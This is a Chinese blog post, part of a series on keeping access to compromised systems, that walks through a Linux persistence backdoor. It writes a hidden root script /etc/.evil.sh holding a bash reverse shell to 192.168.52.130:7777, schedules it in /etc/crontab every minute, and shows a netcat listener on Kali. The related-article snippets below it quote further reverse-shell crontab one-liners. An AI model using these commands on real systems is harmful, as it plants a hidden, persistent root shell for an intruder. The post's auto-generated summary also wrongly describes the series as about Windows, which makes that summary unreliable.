操作系统权限维持(六)之Linux系统-定时任务后门

最新推荐文章于 2025-06-13 11:39:48 发布
原创 最新推荐文章于 2025-06-13 11:39:48 发布 · 892 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #服务器 #安全 #网络安全 #网络

该系列文章探讨了如何在Windows系统中维持操作系统权限,包括使用粘贴键后门、克隆账号、启动项、计划任务和系统服务等方法。文中详细介绍了如何利用crontab命令设置周期性执行的指令,创建反弹shell脚本,并将其添加到计划任务中,以便每分钟执行一次,从而保持远程访问。在Kali机器上,可以监听指定端口接收反弹shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门

定时任务后门

使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹

crontab -u root -r //删除
crontab -u root -l //查看
crontab -u root -e //修改

crontab -u root -l //查看计划任务

在这里插入图片描述

  1. 创建反弹shell脚本,vim /etc/.evil.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.52.130/7777 0>&1

在这里插入图片描述

并加上可执行权限

chmod +x /etc/.evil.sh
  1. 添加计划任务

我们可以使用crontab -e或者vim /etc/crontab添加计划任务

#添加计划任务
vim /etc/crontab
#查看计划任务
cat /etc/crontab

设置定时任务为每分钟执行一次

*/1 * * * * root /etc/.evil.sh #每一分钟执行一次

在这里插入图片描述

kali机器开启监听

nc -lvvp 7777

在这里插入图片描述

kali机器收到反弹shell

在这里插入图片描述

Linux编程中的程序后门设计
DevRevolt的博客
10-05 169
Linux编程中,程序后门是指在程序中故意添加一些隐藏的功能或漏洞,以便未经授权的访问者可以利用这些后门来获取系统权限或执行非法操作。尽管后门在正常的软件开发过程中是不被允许的,但了解后门的设计原理对于提高程序的安全性和防范潜在威胁非常重要。尽管程序后门在合法的软件开发过程中是不被允许的,但了解其设计原理和防范方法对于保护系统安全和防范潜在威胁是非常重要的。程序后门的设计原理可以简单描述为:在程序中添加一段特殊的代码或逻辑,可以通过满足特定条件来触发后门行为。在上述示例中,我们在程序的。
[权限维持] Windows 权限维持 —— 计划任务后门
Blue17 の 小窝
02-24 1224
为了防止靶机重启,或者对方的安全人员 Kill 掉我们刚刚与靶机建立的连接,我们就可以通过建立 Windows 计划任务的方式,让对方的靶机定期执行 update.exe 文件,定时上线。如上,可以说明,当恶意的计划任务正在运行时,又满足了计划任务执行条件,Windows 默认是不会再次执行此任务的,所以此任务就会显示在 “正在运行的任务” 中。攻击者可以在拿下目标后,通过创建计划任务的方式,在目标靶机上留下后门程序,让系统定时执行,这样,即使目标计算机关机重启,攻击者也能重新获得靶机权限
linux排查木马后门定时任务计划
网站安全专家
09-08 514
那如果解除的话大家要删除,不删除的话,在我的实验里它是不允许比如咱们清空这个文件,那么它不允许所有用户建立就是任务了。那如何创建定时任务,很简单,我们通过这个命令,每一个用户都可以创建自己的定时任务,使用一个编辑器打开它,这里就可以创建一个定时任务定时任务保存的路径一共有这么几个。这里就不用说了,它也是一样的,只是他们分了一下就是每小时执行的文件夹,这是每天执行的文件夹,咱们进一个每个月的,比如这里有一个脚本,那么每个月都会执行一次,看一下扩展知识,我们任意用户都可以创建定时任务,是不是很危险。
Linux权限维持-后门
最新发布
qq_45694932的博客
06-13 181
将nologin程序替换为bash,很多时候应急人员查看passwd,发现账户对应的shell为nologin认为就是系统的账号且这个账号是不能远程登陆的或者是登陆之后没有shell的,可能就认为这个账号是安全的,所以我们就可以将nologin设置成bash,并且修改这个账号的密码,如系统自带的backup账号就是一个很好用账户。vim安装时默认安装了当前服务器的python版本的扩展,利用该扩展,可以用vim的扩展pyfile来执行python脚本。排查:检查/etc/passwd文件是否有异常。
Linux渗透之反弹Shell命令解析
热门推荐
deeplearnings的博客
08-18 1万+
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B
linux 反弹后门 c语言,C语言做的后门【反连】
weixin_42441929的博客
05-12 215
该楼层疑似违规已被系统折叠隐藏此楼查看此楼/*Protocol of connectionConnect : CONNConnected Success : SUCCReboot : REBT 暂时不可用Upload : UPLDDownload : DNLDDestroy : DTOY 暂时不可用Help : HELP 暂时不可用OK : START TO TRANSFER ...
Linux下的ICMP反弹后门:PRISM
J_linnb的博客
04-26 730
安装完解压后可以看到文件内容很简单,根据网站上的介绍可以得知它可以在Linux,Solaris,AIX,BSD/Mac,Android等多个系统运行。脚本发送包到后门主机,本地监听相关端口等待后门主机反弹连接(先开一个终端进行第一步监听,再开一个终端使用sendPacket.py脚本)使用此操作模式,后门在后台静默等待特定的 ICMP 数据包,该数据包包含要重新连接的主机/端口和防止第三方访问的私钥。比赛时遇到的这个基于ping的ICMP后门,看了很多大佬写的文章,自己决定试一下。交叉编译prism后门
连载|浅谈红队中的权限维持-Linux 主机后门Linux 隐藏文件
无问社区的博客
07-31 1088
除此之外,还有比较常见的定时任务、SSH 公钥登录以及 SSH warpper、openssh 后门、PAM 后门、rootkit 后门等等。这时当用户使用 ssh 连接其他主机时,在 /tmp/.ssh.log 下就能看到连接的密码、操作了,只是显示的不是很直观。这样当用户使用 ls 命令时,就会反弹 shell 回来了,当然除了反弹 shell 还可以做很多的其他操作。自定义文件的时间,这里表示将时间改为 2022 年的 1 月 1 日 1 时 1 分 1 秒。
权限维持——Linux
weixin_58666006的博客
09-25 1280
拿到管理员权限后,为了方便回来,需要留后门进行权限维持;即便是防守方也是需要了解权限维持,因为知己知彼,百战不殆。
Linux应急响应-溯源-系统日志排查
09-23 1909
systemd-journald 是一个收集并存储各类日志数据的系统服务。它创建并维护一个带有索引的、结构化的日志数据库,并可以收集来自各种不同渠道的日志。systemd 是内核启动后的第一个用户进程,PID 为 1,是所有其它用户进程的父进程。所有服务的启动运行日志都可以记录到 systemd-journald 中,日志守护进程会以安全且不可伪造的方式自动收集每条日志的元数据。默认情况日志是存储在内存中的,系统重启后都会丢失。
简单的Linux查找后门思路和shell脚本分享
09-15
主要介绍了简单的Linux查找后门思路和shell脚本分享,本文的方法相对简单,提了一个思路和简单的Shell实现脚本,需要的朋友可以参考下
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址.txt
04-21
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址,真实有效,亲测可用。
操作系统权限维持(十)之Linux系统- TCP Wrappers反弹shell后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-28 552
以ssh为例,每当有ssh的连接请求时,tcpd即会截获请求,先读取系统管理员所设置的访问控制文件,符合要求,则会把这次连接原封不动的转给真正的ssh进程,由ssh完成后续工作;TCPWrappers是一个工作在第四层(传输层)的的安全工具,对有状态连接的特定服务进行安全检测并实现访问控制,凡是包含libwrap.so库文件的的程序就可以受TCPWrappers的安全控制。当使用服务端ssh连接的时候,它开始匹配规则,然后利用spawn执行的nc反弹了一个root权限shell
mssql 计划怎每隔n秒_计划任务后门 | Linux 后门系列
weixin_39925813的博客
11-29 213
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了0x01 cron服务简介我们来寻找一下这个工具的地址吧!既然是一项服务,那么启动、停止、查询状态等操作相信大家都会了默认情况下Ubuntu 16.04 中 cron 服务是默认开机自启的这个服务的使用也是比较简单,cr...
linux 反弹后门 c语言,什么是反弹shell 在liunx下如何检测后门
weixin_28752743的博客
05-12 290
反弹shell攻击者拿来控制目标网站服务器的1种方式。目标网站服务器主动发出网络连接请求,将网站服务器命令执行的规范输入、规范输出和规范错误重定向给攻击者。通过监听来自目标网站服务器的请求,攻击者向目标服务器发送指令并获得执行结果。它通常用于目标网站服务器位于内部网、受防火墙策略限制等入侵场景。云上的现状通过分析云上近三年的Linux网站服务器入侵恶性事件,反弹shell建立的语言和软件在攻击环...
一条命令实现命令行反弹后门
weixin_34149796的博客
02-04 329
TCP反弹后门//python版本,kali下面测试成功,tcp8080: (crontab-l;printf"*/5****/usr/bin/python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.1...
linux 定时任务 crontab 反弹 shell
weixin_30699463的博客
06-26 1682
日期:2018-11-26 13:47:34 介绍:如何使用定时任务反弹 shell? 0x01、 基本命令 参数 -e:编辑该用户的计时器设置; -l:列出该用户的计时器设置; -r:删除该用户的计时器设置; -u <用户名称>:指定要设定计时器的用户名称。 MAC 直接使用 crontab -e 无效: 编辑 username 的 cr...
linux定时执行后门,linux隐藏你的crontab后门
weixin_39582569的博客
05-14 688
crontab定时后门crontab是用来定期执行程序的命令,crond 命令每分钟会定期检查是否有要执行的工作,如果有要执行的工作便会自动执行该工作。注意: 新创建的 cron 任务,不会马上执行,至少要过 2 分钟后才可以,当然你可以重启 cron 来马上执行比如我们通过redis写crontab后,管理员上线 执行`crontab -l` 就会查看到我们留下的可疑命令。那么我们如果躲避管理员...
Unix/Linux操作系统中禁止存在缺乏权限控制的无属主文件
03-16
好的,我现在需要处理用户的问题:“Unix/Linux操作系统中禁止存在缺乏权限控制的无属主文件”。首先,我要理解用户的问题到底是什么。用户提到的是“缺乏权限控制的无属主文件”,这可能指的是那些没有明确所有者或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值